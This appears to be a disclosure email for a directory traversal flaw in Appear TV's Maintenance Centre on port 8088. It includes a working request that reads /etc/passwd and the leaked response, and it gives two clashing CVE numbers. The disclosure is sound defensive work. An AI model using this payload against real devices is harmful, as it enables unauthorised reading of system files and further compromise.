CVE-2018-7539 Directory Traversal on Appear TV Maintenance centre 8088 Discoverer: Arqiva Threat Team Person Karl W Product: Appear TV XC Hardware Maintenance Centre on port TCP/8088 Vendor : Appear TV Code Versions: All Version Vulnerability: Directory Traversal Impact: It is possible to read OS files with specially crafted URL Attack Type: Remote CVE: CVE-2017-12544 ------------------------------------------ Description The web server (fuzzd/0.1.1) running the Maintenance Center on port TCP/8088 allows an attacker to use a specially crafted URL to read Operating System (OS) files. This vulnerability was used in the full compromise of the appliance. ------------------------------------------ Proof code: Request: GET /../../../../../../../../../../../../etc/passwd Host: x.x.x.x:8088 User-Agent: curl/7.56.1 Accept: */* Response: HTTP/1.1 200 OK Content-Length: 1110 Content-Type: text/plain; charset=utf-8 Cache-Control: max-age=3600 Server: fuzzd/0.1.1 root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin ------------------------------------------ [Reference] https://www.appeartv.com/xc5000xc5100/ ------------------------------------------ vendor confirmed and acknowledged the vulnerability Advised work around by disabling Maintenance Centre when not in use. Advised not able to fix. ------------------------------------------ Regards Karl W _________________________________________________________________________________________________ This email, its content and any files transmitted with it are for the personal attention of the addressee only, any other usage or access is unauthorised. It may contain information which could be confidential or privileged. If you are not the intended addressee you may not copy, disclose, circulate or use it. If you have received this email in error, please destroy it and notify the sender by email. Any representations or commitments expressed in this email are subject to contract. Although we use reasonable endeavours to virus scan all sent emails, it is the responsibility of the recipient to ensure that they are virus free and we advise you to carry out your own virus check before opening any attachments. We cannot accept liability for any damage sustained as a result of software viruses. We reserve the right to monitor email communications through our networks. Arqiva Limited. Registered office: Crawley Court, Winchester, Hampshire SO21 2QA United Kingdom Registered in England and Wales number 2487597 _________________________________________________________________________________________________